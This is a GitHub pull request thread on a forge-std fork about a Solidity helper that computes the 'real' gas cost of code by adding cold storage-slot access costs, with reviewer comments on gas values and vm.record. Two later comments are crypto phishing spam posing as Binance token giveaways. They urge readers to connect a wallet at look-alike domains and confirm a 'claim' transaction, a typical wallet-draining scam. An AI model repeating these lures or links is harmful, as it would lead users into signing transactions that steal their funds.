feat: real gas cost metering
MathisGD/forge-std pull request #1
Opened 2023-01-07 16:03 UTC by MathisGD

Helper to calculate the "real" gas cost some Solidity code. 

It adds the access cost of cold storage slot to the slots that would have been cold if the sequence was done in a transaction on its own (outside of the test).

2023-01-09 23:03 UTC, QGarchery requested changes
Nice one :tada: :tada: 

2 things to resolve to be confident in this PR

2023-01-09 23:03 UTC, QGarchery commented on src/StdGas.sol
> +                gasConsumed += 2100;
:warning: Storage reads only add 2000 gas when they are cold (2100 is correct for storage writes though)

2023-01-09 23:03 UTC, QGarchery commented on src/StdGas.sol
> +        // Retrive all accesses (read an write).
```suggestion
        // Retrieve all accesses (read an write).
```

2023-01-09 23:03 UTC, QGarchery commented on src/StdGas.sol
> +            accessed[address(this)][slots[i]] = true;
We can put this into an `else` branch to avoid doing it after the first iteration

2023-01-09 23:03 UTC, QGarchery commented on src/StdGas.sol
> +        vm.record();
:warning: I think I don't understand how this works and what is recorded

2023-01-09 23:31 UTC, MathisGD commented on src/StdGas.sol
> +                gasConsumed += 2100;
Nice catch

2023-01-09 23:31 UTC, MathisGD commented on src/StdGas.sol
> +                gasConsumed += 2100;
Nice catch

2023-01-10 08:58 UTC, QGarchery commented on src/StdGas.sol
> +        vm.record();
Seen with @MathisGD: the `vm.accesses` function returns all the accesses (read & write) since the last `vm.record`

2023-12-29 16:28 UTC, yinka5521 commented
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

2024-01-02 04:20 UTC, anilv2k commented
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

2024-03-08 10:20 UTC, closed without merging